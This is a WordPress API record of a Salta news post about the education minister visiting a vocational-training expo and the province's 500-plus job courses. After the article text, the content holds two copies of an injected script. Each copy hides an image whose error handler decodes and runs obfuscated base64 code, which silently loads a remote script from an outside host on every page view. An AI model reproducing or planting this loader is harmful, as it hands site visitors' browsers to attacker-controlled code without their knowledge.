{"id":3184,"date":"2023-10-17T09:09:53","date_gmt":"2023-10-17T12:09:53","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3184"},"modified":"2025-08-14T00:07:09","modified_gmt":"2025-08-14T03:07:09","slug":"salta-cuenta-con-mas-de-500-ofertas-de-formacion-para-el-trabajo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3184","title":{"rendered":"Salta cuenta con m\u00e1s de 500 ofertas de formaci\u00f3n para el trabajo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#90083a\"><em>El ministro de Educaci\u00f3n, Mat\u00edas C\u00e1nepa, acompa\u00f1\u00f3 a los 67 centros de formaci\u00f3n profesional de la provincia, durante una exposici\u00f3n de trabajos que se realiz\u00f3 en el Colegio Salesiano, de capital.<\/em><\/h4>\n\n\n\n<p>El ministro de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda de Salta,&nbsp;<strong>Mat\u00edas C\u00e1nepa,&nbsp;<\/strong>dialog\u00f3 con docentes y estudiantes que se capacitan laboralmente en los centros de formaci\u00f3n profesional de la Provincia. Fue durante la Expo Profesional 2023 que se desarroll\u00f3 en el Colegio Salesiano \u00c1ngel Zerda, donde los centros de formaci\u00f3n exhibieron sus trabajos en 66 stands y mostraron diferentes cursos y carreras de r\u00e1pida salida laboral, que fueron pensados para preparar a los j\u00f3venes y adultos salte\u00f1os para el mundo del trabajo.<\/p>\n\n\n\n<p>Actualmente Salta trabaja mancomunadamente, con el sector privado para adecuar la oferta educativa en oficios, a las necesidades planteadas por el sector socio productivo local, a fin de continuar formando mano de obra calificada.<br>Cabe destacar que esta gesti\u00f3n de gobierno ampli\u00f3 a 500 los cursos de formaci\u00f3n laboral y adem\u00e1s brinda, a trav\u00e9s de 17 secundarias profesionales, la doble titulaci\u00f3n: de bachiller y en oficios, que pueden ser seleccionadas por el alumno.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El ministro de Educaci\u00f3n, Mat\u00edas C\u00e1nepa, acompa\u00f1\u00f3 a los 67 centros de formaci\u00f3n profesional de la provincia, durante una exposici\u00f3n de trabajos que se realiz\u00f3 en el Colegio Salesiano, de capital. El ministro de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda de Salta,&nbsp;Mat\u00edas C\u00e1nepa,&nbsp;dialog\u00f3 con docentes y estudiantes que se capacitan laboralmente en los centros de formaci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3185,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-3184","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3184"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3184"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3184\/revisions"}],"predecessor-version":[{"id":6945,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3184\/revisions\/6945"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3185"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3184"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3184"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}